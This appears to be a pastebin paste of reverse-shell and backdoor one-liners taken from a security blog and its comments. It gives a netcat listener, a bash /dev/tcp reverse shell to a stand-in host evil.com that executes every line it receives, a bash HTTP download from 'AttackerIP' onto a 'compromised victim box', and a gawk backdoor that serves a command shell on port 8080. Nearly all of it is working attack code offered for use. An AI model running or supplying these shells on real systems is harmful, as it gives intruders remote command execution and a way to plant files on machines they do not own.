SHOW:
|
|
- or go back to the newest paste.
| 1 | ============================================ | |
| 2 | www.techgaun.com | |
| 3 | Reverse shell examples from http://www.gnucitizen.org/blog/reverse-shell-with-bash/ including those from comments | |
| 4 | www.techgaun.com | |
| 5 | ============================================ | |
| 6 | ||
| 7 | Although netcat is very useful, and you may have to use it in most cases, here is a simple technique which emulates what netcat does but it relies on bash only. Let’s see how. | |
| 8 | ||
| 9 | In step one we start a listening service on our box. We can use netcat, or whatever you might have at hand. | |
| 10 | ||
| 11 | $ nc -l -p 8080 -vvv | |
| 12 | ||
| 13 | On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor. | |
| 14 | ||
| 15 | $ exec 5<>/dev/tcp/evil.com/8080 | |
| 16 | $ cat <&5 | while read line; do $line 2>&5 >&5; done | |
| 17 | ||
| 18 | ------------- | |
| 19 | ||
| 20 | Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim. | |
| 21 | ||
| 22 | 1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack. | |
| 23 | 2. Start up the web server on the attacker box | |
| 24 | 3. On the victim box do: | |
| 25 | ||
| 26 | (echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \ | |
| 27 | 1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \ | |
| 28 | | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \ | |
| 29 | do read i; done; cat) > local_filename | |
| 30 | ||
| 31 | Credit where credit is due: | |
| 32 | http://www.pebble.org.uk/linux/bashbrowser | |
| 33 | ||
| 34 | ------------- | |
| 35 | Reverse shell in gawk | |
| 36 | #!/usr/bin/gawk -f | |
| 37 | #!/usr/bin/gawk -f | |
| 38 | ||
| 39 | BEGIN {
| |
| 40 | Port = 8080 | |
| 41 | Prompt = "bkd> " | |
| 42 | ||
| 43 | Service = "/inet/tcp/" Port "/0/0" | |
| 44 | while (1) {
| |
| 45 | do {
| |
| 46 | printf Prompt |& Service | |
| 47 | Service |& getline cmd | |
| 48 | if (cmd) {
| |
| 49 | while ((cmd |& getline) > 0) | |
| 50 | print $0 |& Service | |
| 51 | close(cmd) | |
| 52 | } | |
| 53 | } while (cmd != "exit") | |
| 54 | close(Service) | |
| 55 | } | |
| 56 | } | |
| 57 | ||
| 58 | - | macuberg |
| 58 | + | |
| 59 | www.techgaun.com |
